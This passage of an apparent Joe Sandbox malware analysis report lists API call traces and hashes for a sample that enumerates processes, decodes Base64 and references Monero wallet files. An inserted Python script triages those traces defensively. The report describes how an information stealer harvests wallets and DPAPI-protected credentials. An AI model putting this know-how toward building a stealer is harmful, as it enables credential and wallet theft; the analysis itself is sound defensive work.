                  • StrCmpCA.SHLWAPI(?,00000000), ref: 009B965C
                  • CloseHandle.KERNEL32(009C0ACA), ref: 009B967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: f4aea7c74bdeeb0b618d8e89e8e2d20495c3ee9884640178f4485b8347e1e760
                  • Instruction ID: 45259d5a125357ceaff84ee5450ff006b15153493382f106bdac83b05b87521e
                  • Opcode Fuzzy Hash: f4aea7c74bdeeb0b618d8e89e8e2d20495c3ee9884640178f4485b8347e1e760
                  • Instruction Fuzzy Hash: C9011EB5A10208EBDB14DFA5CD98BEDBBFCEB48310F104188A90AA7240DB34AF40CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (/k$7Jow$QF|{$VeM#
                  • API String ID: 0-3448816325
                  • Opcode ID: 843adc50051d39fbc33333e240417398aa273c9624d560d33fc334fd218f462f
                  • Instruction ID: 3927d9527dec7241dc13220988e72eff39340eee6278296929996f79534a78ee
                  • Opcode Fuzzy Hash: 843adc50051d39fbc33333e240417398aa273c9624d560d33fc334fd218f462f
                  • Instruction Fuzzy Hash: 23B206F3A0C6049FE3046E2DEC8567AFBE5EF94320F164A3DEAC583740EA7558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mb:_$Rl~$}]}}${|
                  • API String ID: 0-729340950
                  • Opcode ID: e9f53ec84e5ddbbcb9da07a363bd0413acb832c1dd34d007d8e075314d99e95e
                  • Instruction ID: 1b9b90dac0622df60a6e281c43d8434a9aea38101f90652c7e099939fa121ace
                  • Opcode Fuzzy Hash: e9f53ec84e5ddbbcb9da07a363bd0413acb832c1dd34d007d8e075314d99e95e
                  • Instruction Fuzzy Hash: E4B206F3A0C6149FE304AE2DEC8567AFBE5EFD4320F1A453DEAC483744E63598058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 26)$:ml?$Rrc{$ku{
                  • API String ID: 0-1337216423
                  • Opcode ID: 3951f19b08ee0e77c05053de92fb65698adc2ea7d902a9c72b71f219977f6df3
                  • Instruction ID: 8b513434836debaeeddfa1c5841f125797dd88a692e01fc069ad879ee26feb21
                  • Opcode Fuzzy Hash: 3951f19b08ee0e77c05053de92fb65698adc2ea7d902a9c72b71f219977f6df3
                  • Instruction Fuzzy Hash: 13A216F3A0C2149FE3046E6DEC8577AFBE9EF94620F1A453DEAC4C3744EA3558018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &^$4^F$B1{y$Vhs.
                  • API String ID: 0-749318759
                  • Opcode ID: 6a0a24895745efab5070852a4ac574a440fb93368ff58768b7e8ef151e609534
                  • Instruction ID: a09fb433095bbc96353735042bd597f6c73fb32c7e3f45c12b58bbe95d946d4b
                  • Opcode Fuzzy Hash: 6a0a24895745efab5070852a4ac574a440fb93368ff58768b7e8ef151e609534
                  • Instruction Fuzzy Hash: 037239F36082049FE3046E2DEC4567AF7E9EF94720F1A893DE6C4C7744EA7598018696
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009C05B7), ref: 009B86CA
                  • Process32First.KERNEL32(?,00000128), ref: 009B86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 009B86F3
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • CloseHandle.KERNEL32(?), ref: 009B8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 1406646baf0e196e08dabba138c6ddeb85d1362454d57d6bb18e74883e4585a8
                  • Instruction ID: 07c0ba80345c74de25197b26f21494453978d5c4e5e9f0bc3ae55457e426cf60
                  • Opcode Fuzzy Hash: 1406646baf0e196e08dabba138c6ddeb85d1362454d57d6bb18e74883e4585a8
                  • Instruction Fuzzy Hash: 99313971901218ABCB24DB94CD95FEEB77CEB89720F104199A10AA61A0DF346E45CFA2
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,009A5184,40000001,00000000,00000000,?,009A5184), ref: 009B8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: dc246ab18c8903e6c698a251f70906b6f13b121082cc6952d9bc6c509dae14ed
                  • Instruction ID: dbe6e27d1c789fca109f22e78b60815beb107b5e9ecf321ac752fee4351487cc
                  • Opcode Fuzzy Hash: dc246ab18c8903e6c698a251f70906b6f13b121082cc6952d9bc6c509dae14ed
                  • Instruction Fuzzy Hash: 14110670200208BFDB00DFA4D988FBB37ADAF89320F109848F9198B250DB35E841DBA0
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                  • LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 9571fda32eb9329b928e4f8fe7de5ae548073aff743323c2fc45d1eb4e3cb1b3
                  • Instruction ID: fa86a7a44824c1b0711598262a1b2d9aa695a328746438db46dfbe69bf907cea
                  • Opcode Fuzzy Hash: 9571fda32eb9329b928e4f8fe7de5ae548073aff743323c2fc45d1eb4e3cb1b3
                  • Instruction Fuzzy Hash: 6711A2B4240208EFEB10CF64DC95FAA77B9FB89701F208058F9159F390C7B6A941CBA0
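The report above lists, per disassembled function, only the raw Win32 call sequence and the stack values at each call. What an analyst actually wants from those records is the behaviour they imply: the CryptUnprotectData → WideCharToMultiByte → LocalFree function is a DPAPI decrypt of a protected blob into an ANSI string, the two CreateToolhelp32Snapshot → Process32First → Process32Next functions walk the process list (one of them alongside the literal `\Monero\wallet.keys`), and the CryptStringToBinaryA → LocalAlloc → CryptStringToBinaryA function is the classic two-pass Base64 decode (size query, allocate, decode). The script below is an added example, not Joe Sandbox's code and not the sample's: it parses the listing format used on this page (an `APIs` header, one bullet per call, a record closed by its `Opcode ID` line), decodes the flag arguments by their documented Win32 parameter positions, and labels each record with those behaviours. The behaviour labels and the rule set are this example's own; `SAMPLE` is an excerpt of this page's records trimmed to the lines the parser needs.

```python
"""Triage the per-function API listings of a Joe Sandbox report (added example; SAMPLE
is an excerpt of this page's listing, the rule set and labels are this example's own)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One bullet under an "APIs" header; the "Part of subcall function" prefix, the
# argument list and the ", ref:" address are each optional on the page.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
TH32CS_SNAPPROCESS, CRYPTPROTECT_UI_FORBIDDEN, CRYPT_STRING_BASE64 = 0x2, 0x1, 0x1  # Win32 SDK values

@dataclass
class ApiCall:
    name: str
    dll: str
    args: list[str]
    ref: str
    subcall: str | None = None  # set when the report attributes the call to a callee

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    opcode_id: str = ""

def parse_records(text: str) -> list[FunctionRecord]:
    """Collect each 'APIs' block and the 'Opcode ID' line that closes its record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["dll"], args, m["ref"] or "", m["sub"]))
        elif line.startswith("• Opcode ID:"):
            current.opcode_id = line.split(":", 1)[1].strip()
            current = None  # record complete; skip metadata until the next 'APIs'
    return records

def hexarg(call: ApiCall, index: int) -> int | None:
    """Argument `index` as an int; None when it is '?' (unresolved) or absent."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None

def contains_in_order(calls: list[ApiCall], pattern: tuple[str, ...]) -> bool:
    # Ordered, not necessarily adjacent, subsequence match on API names.
    names = iter(c.name for c in calls)
    return all(want in names for want in pattern)

# (label, ordered API pattern, (api, argument index, expected flag value)); argument
# positions follow the documented Win32 prototypes, e.g. dwFlags is CryptUnprotectData's 6th.
RULES = [
    ("dpapi-decrypt-to-ansi", ("CryptUnprotectData", "WideCharToMultiByte", "LocalFree"),
     ("CryptUnprotectData", 5, CRYPTPROTECT_UI_FORBIDDEN)),
    ("process-enumeration", ("CreateToolhelp32Snapshot", "Process32First", "Process32Next"),
     ("CreateToolhelp32Snapshot", 0, TH32CS_SNAPPROCESS)),
    ("base64-decode-two-pass", ("CryptStringToBinaryA", "LocalAlloc", "CryptStringToBinaryA"),
     ("CryptStringToBinaryA", 2, CRYPT_STRING_BASE64)),
]

def triage(records: list[FunctionRecord]) -> dict[str, dict[str, list[str]]]:
    """Map each flagged function (Opcode ID prefix) to its behaviours and literal paths."""
    findings = {}
    for rec in records:
        hits = [label for label, pattern, (api, i, val) in RULES
                if contains_in_order(rec.calls, pattern)
                and any(c.name == api and hexarg(c, i) == val for c in rec.calls)]
        paths = [a for c in rec.calls for a in c.args if "\\" in a]
        if hits or paths:
            findings[rec.opcode_id[:12]] = {"behaviours": hits, "paths": paths}
    return findings

SAMPLE = """\
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009A7281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009A72A4
• LocalFree.KERNEL32(?), ref: 009A72AE
• Opcode ID: 4e07e07d5a7c5fc9f290ebc1b034f79adc9dd442d318f6b4664dd7b4fb6493bf
APIs
• Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009C05B7), ref: 009B86CA
• Process32First.KERNEL32(?,00000128), ref: 009B86DE
• Process32Next.KERNEL32(?,00000128), ref: 009B86F3
• Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\\Monero\\wallet.keys,009C0E17), ref: 009BA9C5
• Opcode ID: 1406646baf0e196e08dabba138c6ddeb85d1362454d57d6bb18e74883e4585a8
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
• Opcode ID: 9571fda32eb9329b928e4f8fe7de5ae548073aff743323c2fc45d1eb4e3cb1b3
"""
```

Run `triage(parse_records(SAMPLE))` to get one entry per flagged function. Two caveats when applying this to a full report: the values Joe Sandbox prints are the stack slots at the call site, so positional decoding is only meaningful for the leading parameters (trailing entries are whatever else was on the stack, and `?` marks a slot it could not resolve), and a `dwFlags` of 1 on CryptUnprotectData (CRYPTPROTECT_UI_FORBIDDEN) means the decrypt fails silently instead of prompting, which is the setting unattended credential theft needs. The ordered-subsequence match is deliberately loose: intervening calls such as GetProcessHeap or StrCmpCA do not break a pattern, which is what makes the second Toolhelp32 function match the same rule as the first.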
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009C0E00,00000000,?), ref: 009B79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,009C0E00,00000000,?), ref: 009B79C4
                  • wsprintfA.USER32 ref: 009B79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 51fc27b13a8b94c369dda8aec49ae07e8e7880d9d19bcb539525f53ebb666d6b
                  • Instruction ID: 505fd295d0c93d1fc5d1a6eefa9228b4dd791d22f150a1ccd57eef382762e12b
                  • Opcode Fuzzy Hash: 51fc27b13a8b94c369dda8aec49ae07e8e7880d9d19bcb539525f53ebb666d6b
                  • Instruction Fuzzy Hash: 57112AB2904158ABCB14DFC9DD85BBEB7FCFB4CB11F10421AF605A2280E6395940C7B1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015EF2F8,00000000,?,009C0E10,00000000,?,00000000,00000000), ref: 009B7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015EF2F8,00000000,?,009C0E10,00000000,?,00000000,00000000,?), ref: 009B7A7D
                  • wsprintfA.USER32 ref: 009B7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
